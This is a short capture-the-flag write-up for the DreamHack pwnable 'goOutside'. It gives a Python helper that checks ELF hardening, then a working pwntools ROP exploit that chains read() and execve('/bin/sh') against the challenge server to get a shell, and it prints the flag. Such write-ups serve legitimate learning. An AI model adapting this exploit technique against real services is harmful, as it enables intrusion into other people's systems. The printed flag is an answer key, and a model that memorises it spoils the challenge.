[DreamHack] [Pwnable] goOutside

First, let me check the binary's protections.

It has Partial RELRO, PIE is disabled, and there is no canary.
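The three protections listed above can be checked from the ELF structures themselves. The following Python is an added example (not from this writeup or the DreamHack challenge): it parses the ELF64 header and program headers to report PIE (e_type == ET_DYN) and the RELRO level (PT_GNU_RELRO segment, upgraded to Full when the dynamic section carries BIND_NOW), and uses the presence of the __stack_chk_fail symbol name as a canary heuristic. build_sample constructs a minimal ELF image for testing; it is not the challenge binary.

```python
import struct

ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 0, 24, 30, 0x8


def check_hardening(elf: bytes) -> dict:
    """Report PIE, RELRO level and a canary heuristic for an ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2:  # ELFCLASS64 only
        raise ValueError("not an ELF64 image")
    e_type, = struct.unpack_from("<H", elf, 16)         # ET_DYN means PIE
    e_phoff, = struct.unpack_from("<Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    relro = bind_now = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, _, p_offset, _, _, p_filesz = struct.unpack_from("<IIQQQQ", elf, off)
        if p_type == PT_GNU_RELRO:          # GOT made read-only after relocation
            relro = True
        elif p_type == PT_DYNAMIC:          # BIND_NOW upgrades Partial to Full RELRO
            for pos in range(p_offset, p_offset + p_filesz - 15, 16):
                d_tag, d_val = struct.unpack_from("<qQ", elf, pos)
                if d_tag == DT_NULL:
                    break
                if d_tag == DT_BIND_NOW or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW):
                    bind_now = True
    return {
        "pie": e_type == ET_DYN,
        "relro": "Full" if relro and bind_now else "Partial" if relro else "No",
        # heuristic: code built with -fstack-protector references this symbol
        "canary": b"__stack_chk_fail" in elf,
    }


def build_sample(pie: bool, relro: bool, bind_now: bool, canary: bool) -> bytes:
    """Constructed minimal ELF64 image for testing; not a loadable binary."""
    dyn = struct.pack("<qQ", DT_FLAGS, DF_BIND_NOW if bind_now else 0)
    dyn += struct.pack("<qQ", DT_NULL, 0)
    phdrs = [(PT_DYNAMIC, 6, 0x1000, 0x1000, 0x1000, len(dyn), len(dyn), 8)]
    if relro:
        phdrs.append((PT_GNU_RELRO, 4, 0x1000, 0x1000, 0x1000, len(dyn), len(dyn), 1))
    ident = b"\x7fELF" + bytes([2, 1, 1]) + b"\x00" * 9   # ELF64, little-endian, v1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC, 62, 1,
                               0, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    img = ehdr + b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs)
    img = img.ljust(0x1000, b"\x00") + dyn              # dynamic section at offset 0x1000
    return img + (b"__stack_chk_fail\x00" if canary else b"")
```

The first sample in the test reproduces this challenge's profile (Partial RELRO, no PIE, no canary); on a real file, pass open(path, "rb").read() to check_hardening.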

It is a straightforward ROP problem.

Collect the required gadgets and build the exploit.

Exploit

from pwn import *

# p = process("./prob")
p = remote("host8.dreamhack.games", 24154)

# Gadget addresses are fixed because PIE is disabled.
syscall = 0x000000000040470c
pop_rdi = 0x0000000000493797
pop_rdx = 0x000000000043b902  # pop rdx; ret 1
pop_rsi_r15 = 0x0000000000493795
pop_rax = 0x000000000040ac84

p.sendlineafter(b"> ", b"1")

# Padding: 0x40 copies of one address, filling the buffer up to the saved return address.
pay = p64(0x0000000000492A60) * 0x40
# First chain: read(0, 0x54b000, rdx) with rdx left as the program set it; the string sent below lands at 0x54b000.
pay += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x547000 + 0x4000) + p64(0) + p64(pop_rax) + p64(0) + p64(syscall)
# Second chain: execve(0x54b000, 0, 0), rax = 0x3b.
pay += p64(pop_rsi_r15) + p64(0) + p64(0) + p64(pop_rdi) + p64(0x547000 + 0x4000) + p64(pop_rax) + p64(0x3b) + p64(pop_rdx) + p64(0) + p64(syscall)
p.sendlineafter(b"> ", pay)

p.sendlineafter(b"> ", b"3")

sleep(0.5)
p.sendline(b"/bin/sh\x00")  # NUL-terminated path consumed by the read() in the first chain

p.interactive()

Flag : WaRP{b83c27ef1b3ae369e15de0a8643b5585d6a35ab071d96e839bd78a31067ba1af}